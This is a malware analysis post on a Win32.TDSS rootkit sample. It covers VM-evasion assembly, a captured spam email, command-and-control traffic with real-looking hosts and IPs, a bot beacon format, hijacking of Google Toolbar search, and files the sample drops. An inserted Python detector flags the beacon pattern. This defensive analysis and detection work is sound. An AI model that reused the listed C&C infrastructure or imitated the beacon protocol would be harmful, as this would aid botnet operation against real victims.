
Win32.TDSS

As a malware researcher I recently got my hands on one of the latest TDSS malware samples.

The malware protects itself against execution on a virtual machine using the SIDT query technique; if a VMware environment is detected, the malware simply terminates and removes itself from the machine. For this analysis I therefore used only a physical machine. The malware also prevents itself from running more than once by creating a named event, which conveniently doubles as a signaling/synchronization primitive.

** TO VIEW THE FULL REPORT: http://www.flap71.com/tdss/ **

push esi
push offset aGfdjhfd ; "gfdjhfd"
push 1 ; bInitialState
push 1 ; bManualReset
push 0 ; lpEventAttributes
call ds:CreateEventA

push fs[0]

RCPT TO:
DATA
Received: 20100421082301.2417.qmail@
Date: Wed, 21 Apr 2010 06:23:01 -0120
Message-ID:
To: nicolad@hammondresources.co.uk
Subject: April Discount #88724
From: USA VIAGRA
Reply-To: nicolad@hammondresources.co.uk
MIME-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 8bit

http://tuxoxynuri.livejournal.com

Command & Coordination Communication (Data is being encoded)

HTTP/1.1 200 OK
magic-number : 128|1|176:78:92:79:102:102:50:246:184:71:97:63:185:238:83:142:67:150:205:76:183:198:210:215:181:120:211:118:191:153:157:112:231:250:191:77:96:242:68:24:58:165:88:243:148:171:129:215:66:79:36:249:22:246:208:203:110:163:65:46:60:223:158:36:217:93:113:57:80:181:82:138:91:170:125:240:86:255:200:152:79:236:145:101:226:97:49:81:5:114:127:66:82:29:102:43:123:215:100:203:141:183:85:233:98:211:217:184:211:162:80:34:142:226:136:112:68:185:194:73:44:65:139:126:95:241:169:218:
content-length : 40448
entity-info : 1271783310:40448:2;
x-powered-by : PHP/5.2.6-1+lenny8
vary : Accept-Encoding
server : nginx/0.6.32
connection : close
version : 1
date : Wed, 21 Apr 2010 07:30:58 GMT
rnd : 11988440
content-type : text/html; charset=utf-8

http://hjwbxhqr.cn/win-xp/controller.php?action=report&guid=0&rnd=11987634&uid=7&entity=1271783310

Send Update Notification To The Command & Coordination Server

GET /antivirus/update.php HTTP/1.1
User-Agent: id=1A62322F6358&tick=235059234&ver=101&smtp=ok&task=36&continue=1&errors[0]=27&errors[702]=13&errors[703]=2&errors[710]=4&errors[715]=1&errors[716]=5&errors[719]=22
Host: 91.207.7.218
Connection: Keep-Alive
Cache-Control: no-cache
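For a defender, the beacon above is the most useful network indicator in this capture: a User-Agent header that is really a query string (id, tick, ver, smtp, task, continue, errors[N]). The following Python helper is an added example, not part of the original report; it parses that format out of raw HTTP requests and flags matches. The first sample request is the one captured above, the second benign request is constructed.

```python
import re
from urllib.parse import parse_qsl

# Keys seen in the captured beacon; requiring several together keeps the rule
# from matching an ordinary query string that happens to land in a header.
BEACON_KEYS = {"id", "tick", "ver", "smtp", "task", "continue"}
MIN_MATCHING_KEYS = 4
ERROR_KEY = re.compile(r"^errors\[(\d+)\]$")

# Constructed sample traffic: the captured beacon plus a benign request.
SAMPLE_REQUESTS = [
    "GET /antivirus/update.php HTTP/1.1\r\n"
    "User-Agent: id=1A62322F6358&tick=235059234&ver=101&smtp=ok&task=36"
    "&continue=1&errors[0]=27&errors[702]=13&errors[703]=2&errors[710]=4"
    "&errors[715]=1&errors[716]=5&errors[719]=22\r\n"
    "Host: 91.207.7.218\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n",
    "GET /search?q=tdss&hl=en HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "Host: www.example.com\r\n",  # constructed benign request
]

def parse_beacon(user_agent):
    """Return the beacon fields carried in a User-Agent, or None if benign."""
    if "=" not in user_agent or "&" not in user_agent:
        return None
    fields = dict(parse_qsl(user_agent, keep_blank_values=True))
    if len(BEACON_KEYS.intersection(fields)) < MIN_MATCHING_KEYS:
        return None
    # errors[N]=count pairs report per-task failure counts to the controller.
    errors = {}
    for key, value in fields.items():
        if (m := ERROR_KEY.match(key)) and value.isdigit():
            errors[int(m.group(1))] = int(value)
    return {"bot_id": fields.get("id"), "version": fields.get("ver"),
            "task": fields.get("task"), "smtp": fields.get("smtp"),
            "errors": errors}

def scan_http_requests(raw_requests):
    """Return (host, beacon) for every request whose User-Agent is a beacon."""
    hits = []
    for raw in raw_requests:
        headers = {}
        for line in raw.splitlines()[1:]:  # skip the request line
            name, sep, value = line.partition(":")
            if sep:
                headers[name.strip().lower()] = value.strip()
        beacon = parse_beacon(headers.get("user-agent", ""))
        if beacon is not None:
            hits.append((headers.get("host", ""), beacon))
    return hits
```

The same parser can be pointed at proxy logs that record the User-Agent field, since the beacon keys never appear in a legitimate browser identification string.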

Local port bindings.
TCP 1062
TCP 1082
TCP 1086
TCP 1098
TCP 1101
TCP 1102
TCP 1103

Alter Google Toolbar Search.

From the above we can conclude that the malware hooks into the Google Toolbar and uses the Omaha client-server update protocol (update 2), which is Google's protocol for updating its products. It does this for two reasons: to update the remote server and check for any new updates, and to alter the user's search responses from Google and redirect them to its affiliates ("partnerka's"), as we saw above.
It also sends the victim's operating system details, which include the OS version and service pack.

Local System Modifications.
wiaservg.log
%System%\wbem\grpconv.exe
%Windir%\Temp\wpv801271783310.exe